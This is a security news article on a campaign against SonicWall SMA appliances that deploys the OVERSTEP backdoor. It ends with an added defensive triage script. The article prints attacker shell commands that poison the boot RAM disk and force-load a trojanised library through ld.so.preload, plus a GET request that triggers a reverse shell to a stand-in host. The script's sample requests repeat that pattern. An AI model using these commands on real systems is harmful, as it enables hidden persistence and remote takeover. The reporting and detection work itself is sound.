SonicWall SMA Devices 0-Day RCE Vulnerability Exploited to Deploy OVERSTEP Ransomware
Source: cybersecuritynews.com (Vulnerability)
Author: Tushar Subhra Dutta
SonicWall’s end-of-life SMA 100 series appliances are again on the front line after investigators unearthed a covert campaign that couples a suspected zero-day remote-code-execution flaw with a sophisticated backdoor called OVERSTEP.
The operation, attributed to the financially motivated group UNC6148, first steals administrator credentials and one-time-password seeds, then pivots to full device compromise before exfiltrating data and preparing for ransomware deployment.
The attack chain begins with a burst of HTTP requests that ultimately hands the adversary a shell on the appliance—an action that should be impossible under normal conditions.
Google Threat Intelligence analysts noted that once the shell is active the intruder exports the device’s configuration, quietly injects malicious rules, and uploads a base64-encoded binary into the persistent /cf partition.
The binary is later copied to /usr/lib/libsamba-errors.so.6 and force-loaded on every process start via /etc/ld.so.preload, instantly granting the actor root-level reach across the appliance.
Investigators tied the initial foothold to one of several long-standing SMA vulnerabilities routinely traded in crime forums.
Table 1 summarises the most relevant bugs that provide either direct code-execution or credential theft paths exploited by related campaigns over the past three years.
| CVE | Year | Auth? | Type | Key Impact | Patch Status |
|---|---|---|---|---|---|
| CVE-2021-20038 | 2021 | No | Memory corruption RCE | Execute arbitrary code unauthenticated | Patched July 2021 |
| CVE-2024-38475 | 2024 | No | Path traversal | Dump temp.db & persist.db to steal passwords and OTP seeds | Patched Feb 2025 |
| CVE-2021-20035 | 2021 | Yes | Command injection | RCE via /cgi-bin/sitecustomization handler | Patched April 2021 |
| CVE-2021-20039 | 2021 | Yes | Command injection | RCE via /cgi-bin/viewcert handler, linked to Abyss ransomware | Patched May 2021 |
| CVE-2025-32819 | 2025 | Yes | File deletion | Resets built-in admin password to "password" | Patched June 2025 |
The shell commands executed by the dopasswords command show how OVERSTEP compresses the credential databases into a web-reachable TAR archive, so the attacker can download them with a single request.
Persistence Tactics: Hijacking the Boot Sequence
Once a foothold is secured, UNC6148 cements persistence by rewriting the bootCurrentFirmware() routine inside /etc/rc.d/rc.fwboot.
The modified script mounts the device’s compressed initial RAM disk (INITRD), plants the trojanised library, and rewrites INITRD.GZ so the rogue code loads before any legitimate service.
A timestamp “touch” operation aligns file dates with the official kernel image, frustrating any quick metadata checks.
```sh
# Extract and poison INITRD
gzip -d $fwLoc/INITRD.GZ
mount -o loop $fwLoc/INITRD $fwLoc/zzz
# plant the trojanised library and force-load it via ld.so.preload
cp /cf/libsamba-errors.so.6 $fwLoc/zzz/usr/lib/
echo /usr/lib/libsamba-errors.so.6 > $fwLoc/zzz/etc/ld.so.preload
# repack the RAM disk and boot straight into the poisoned image
umount $fwLoc/zzz && gzip $fwLoc/INITRD
mv $fwLoc/INITRD.gz $fwLoc/INITRD.GZ
/usr/local/sbin/kexec -l $fwLoc/BZIMAGE --append="`cat $fwLoc/LINUX.OPT`"
/usr/local/sbin/kexec -e
```
When the appliance reboots, every dynamic binary—including the web server responsible for logging—links against the malicious library.
OVERSTEP hooks open*, readdir*, and write to hide its presence and parse inbound buffers for the strings dobackshell or dopasswords.
A single HTTP GET such as https://device/query?q=dobackshell,1.2.3.4,4444 triggers a reverse shell without touching disk logs, thanks to in-memory log tampering executed inside the hijacked write call.
The result is a resilient foothold: even fully patched appliances can be re-compromised as long as stolen credentials remain valid.
Google’s analysts urge defenders to image disks offline, rotate every password and OTP seed, and verify the absence of /etc/ld.so.preload; its very existence on SMA hardware is “tantamount to compromise”.
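The following triage script is an added example and is not part of the article or of Google's analysis. It puts the two detection opportunities described above into runnable form: a check of an offline-mounted disk image for the filesystem artefacts named on this page (/etc/ld.so.preload, the libsamba-errors.so.6 copy in /usr/lib and /cf, and an rc.fwboot that references ld.so.preload), and a scan of HTTP request lines for the dobackshell and dopasswords command strings. Because OVERSTEP tampers with on-device logs inside the hooked write call, the request scan is meant for request records captured upstream of the appliance (a reverse proxy, a packet capture), not the appliance's own logs. The mount path, the function names and the sample request lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the article): offline triage for OVERSTEP indicators.

# Check an offline-mounted SMA filesystem root for the artefacts the article
# describes. Findings go to stderr; the number of findings is printed to stdout.
overstep_fs_indicators() {
    root="${1:-/}"
    hits=0
    # Any /etc/ld.so.preload on SMA hardware is described as tantamount to compromise.
    if [ -e "$root/etc/ld.so.preload" ]; then
        echo "FINDING: $root/etc/ld.so.preload exists, contents:" >&2
        sed 's/^/    /' "$root/etc/ld.so.preload" >&2
        hits=$((hits + 1))
    fi
    # The implant is staged in /cf and copied to /usr/lib/libsamba-errors.so.6.
    for f in usr/lib/libsamba-errors.so.6 cf/libsamba-errors.so.6; do
        if [ -e "$root/$f" ]; then
            echo "FINDING: implant candidate $root/$f" >&2
            hits=$((hits + 1))
        fi
    done
    # The boot script is rewritten to inject the library into INITRD.GZ;
    # a legitimate rc.fwboot has no reason to mention ld.so.preload.
    if [ -f "$root/etc/rc.d/rc.fwboot" ] && grep -q 'ld.so.preload' "$root/etc/rc.d/rc.fwboot"; then
        echo "FINDING: $root/etc/rc.d/rc.fwboot references ld.so.preload" >&2
        hits=$((hits + 1))
    fi
    echo "$hits"
}

# Count request lines (one HTTP request line per line) that carry either of the
# OVERSTEP command strings. grep -c exits 1 on zero matches, hence the || true.
overstep_request_hits() {
    grep -E -c 'dobackshell|dopasswords' "$1" || true
}

# Constructed sample request lines (not real logs) so the script runs stand-alone.
sample_requests() {
    cat <<'EOF'
GET /query?q=dobackshell,203.0.113.10,4444 HTTP/1.1
GET /cgi-bin/welcome HTTP/1.1
GET /query?q=dopasswords HTTP/1.1
GET /__api__/v1/logon HTTP/1.1
EOF
}

# Stand-alone demo: build a throwaway "image root" that carries the indicators.
demo_root=$(mktemp -d)
mkdir -p "$demo_root/etc" "$demo_root/usr/lib"
echo /usr/lib/libsamba-errors.so.6 > "$demo_root/etc/ld.so.preload"
: > "$demo_root/usr/lib/libsamba-errors.so.6"
echo "filesystem findings: $(overstep_fs_indicators "$demo_root")"
sample_requests > "$demo_root/requests.log"
echo "suspicious request lines: $(overstep_request_hits "$demo_root/requests.log")"
rm -rf "$demo_root"
```

Run it against a real image with `overstep_fs_indicators /mnt/sma-image` after mounting the disk read-only; a non-zero count is the trigger for the full credential and OTP-seed rotation the analysts recommend, since a preload entry alone is enough to treat the appliance as compromised.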